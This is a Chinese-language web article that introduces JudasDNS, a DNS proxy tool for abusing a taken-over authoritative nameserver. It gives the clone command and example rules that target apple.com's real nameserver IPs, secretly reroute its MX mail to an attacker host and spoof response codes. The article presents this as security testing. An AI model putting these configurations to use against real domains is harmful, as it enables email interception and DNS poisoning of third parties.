网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

网络安全工具团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 工具 > 网络安全工具 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

安全测试工具JudasDNS:DNS域名服务器测试,可在目标域名服务器上执行DNS投毒攻击测试,确保域名服务器的安全性。

文章来源:重庆软件开发 发布时间:2020-03-15 20:00:23 围观次数:
分享到:

摘要:安全测试工具JudasDNS:DNS域名服务器测试,可在目标域名服务器上执行DNS投毒攻击测试,确保域名服务器的安全性。

 JudasDNS可以帮助研究人员构建和部署DNS代理服务器,并替换目标域服务器以执行目标攻击。JudasDNS可以为域名的合法域名服务器代理所有DNS查询请求。JudasDNS规则配置使我们可以根据源IP或DNS查询类型来修改DNS响应,这意味着攻击者可以配置恶意域名服务器以实现:从指定的源IP地址范围(通过修改的MX记录)选择性地重新路由入站电子邮件 ,为数据长度设置非常长的TTL或执行DNS缓存投毒之类的攻击。


工具下载


  可以运行以下命令直接克隆项目源:git clone https://github.com/mandatoryprogrammer/JudasDNS.git

blob.png

如何使用JudasDNS


  以下是用于测试示例方案的JudasDNS的示例配置代码。在这种情况下已经获得或接管了苹果公司的权威域名服务器(apple.com):

{

    "version": "1.0.0",

    "port": 2248,

    "dns_query_timeout": 10000,

    "target_nameservers": [ "17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151", "17.151.0.152" ],

    "rules": [

        {

            "name": "Secretly redirect all emails coming from 127.0.0.1!",

            "query_type_matches": [ "MX" ],

            "ip_range_matches": [ "127.0.0.1/32" ],

            "modifications": [

                {

                    "answer": [

                        {

                            "name": "apple.com",

                            "type": 15,

                            "class": 1,

                            "ttl": 10,

                            "priority": 10,

                            "exchange": "hacktheplace.localhost"

                        }

                    ]

                }

            ]

        },

        {

            "name": "Make all responses NOERROR even if they've failed.",

            "query_type_matches": [ "*" ],

            "modifications": [

                {

                    "header": {

                        "rcode": 0

                    }

                }

            ]

        }

    ]

}

配置参数值分析


  1.version:配置文件格式版本(当前为1.0.0);

  2.port:Judas的运行端口;

  3. dns_query_timeout:放弃上游目标名称服务器的回复之前要等待的时间(毫秒);

  4. target_nameservers:目标域名的合法域名服务器,所有的DNS查询将由Judas代表此处的所有请求客户端发出;

  5.规则:用于修改DNS响应的规则列表;

  6.name:给定规则的名称;

  7. query_type_matches:要匹配的查询类型的列表,例如CNAME,A记录等。您还可以使用*通配符来匹配任何类型的查询类型;

  8. ip_range_matches:要匹配的IP范围列表,用于有选择地欺骗对特定IP范围的响应欺骗攻击;

  9.modifications:查看README的“ Modifications”数据部分;


Modifications


  JudasDNS规则提供了modifications规范,可以帮助我们确定在将DNS响应发送回客户端之前对DNS响应进行了哪些修改。在修改响应内容之前,我们还需要检查DNS节点文档以了解DNS响应结构。

  以下是示例DNS响应格式:

{ header: 

   { id: 25373,

     qr: 1,

     opcode: 0,

     aa: 1,

     tc: 0,

     rd: 1,

     ra: 0,

     res1: 0,

     res2: 0,

     res3: 0,

     rcode: 5 },

  question: [ { name: 'apple.com', type: 2, class: 1 } ],

  answer: 

   [ { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'nserver2.apple.com' },

     { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'nserver4.apple.com' },

     { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'nserver.apple.com' },

     { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'nserver3.apple.com' },

     { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'nserver5.apple.com' },

     { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'nserver6.apple.com' },

     { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'adns2.apple.com' },

     { name: 'apple.com',

       type: 2,

       class: 1,

       ttl: 86400,

       data: 'adns1.apple.com' } ],

  authority: [],

  additional: [],

  edns_options: [],

  payload: undefined,

  address: undefined,

...trimmed for brevity...

 编写modifications规则非常简单。这是一组示例规则:

{

  "name": "Make all responses NOERROR even if they've failed.",

  "query_type_matches": [ "*" ],

  "modifications": [

    {

      "header": {

        "rcode": 0

      }

    }

  ]

}

 上面的规则可以匹配任何类型的查询请求,并将DNS响应中的header.rcode值设置为0。

 这是另一个示例规则供您参考:

{

  "name": "Secretly redirect all emails coming from 127.0.0.1!",

  "query_type_matches": [ "MX" ],

  "ip_range_matches": [ "127.0.0.1/32" ],

  "modifications": [

    {

      "answer": [

        {

          "name": "apple.com",

          "type": 15,

          "class": 1,

          "ttl": 10,

          "priority": 10,

          "exchange": "hacktheplace.localhost"

        }

      ]

    }

  ]

}

规则匹配类型


  请求者IP

  以下规则可以匹配客户端的IP地址:

{

  "name": "Make all responses requested from localhost (127.0.0.1) NOERROR.",

  "ip_range_matches": [ "127.0.0.1/32" ],

  "modifications": [

    {

      "header": {

        "rcode": 0

      }

    }

  ]

}

请求查询类型


  以下规则可以匹配两种查询类型MX和CNAME,并应用相应modification规则:

{

  "name": "Make all responses NOERROR even if they've failed.",

  "query_type_matches": [ "MX", "CNAME" ],

  "modifications": [

    {

      "header": {

        "rcode": 0

      }

    }

  ]

}

响应状态码


  以下规则可以匹配NXDOMAIN的响应代码,并应用相应modification规则:

{

  "name": "Make all responses requested from localhost (127.0.0.1) NOERROR.",

  "response_code_matches": [ "NXDOMAIN" ],

  "modifications": [

    {

      "header": {

        "rcode": 0

      }

    }

  ]

}


本文由 重庆软件开发 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:安全测试工具 JudasDNS DNS 服务器测试 域名服务器 DNS投毒攻击测试 服务器安全 重庆软件开发

上一篇:Kali Linux,Nmap,Metasploit,Wireshark,John the Ripper渗透测试工具介绍
下一篇:Monitor Minor:新型跟踪软件,可跟踪Gmail,WhatsApp,Instagram和Facebook用户活动,监视通信渠道

热门资讯

鼠标向下滚动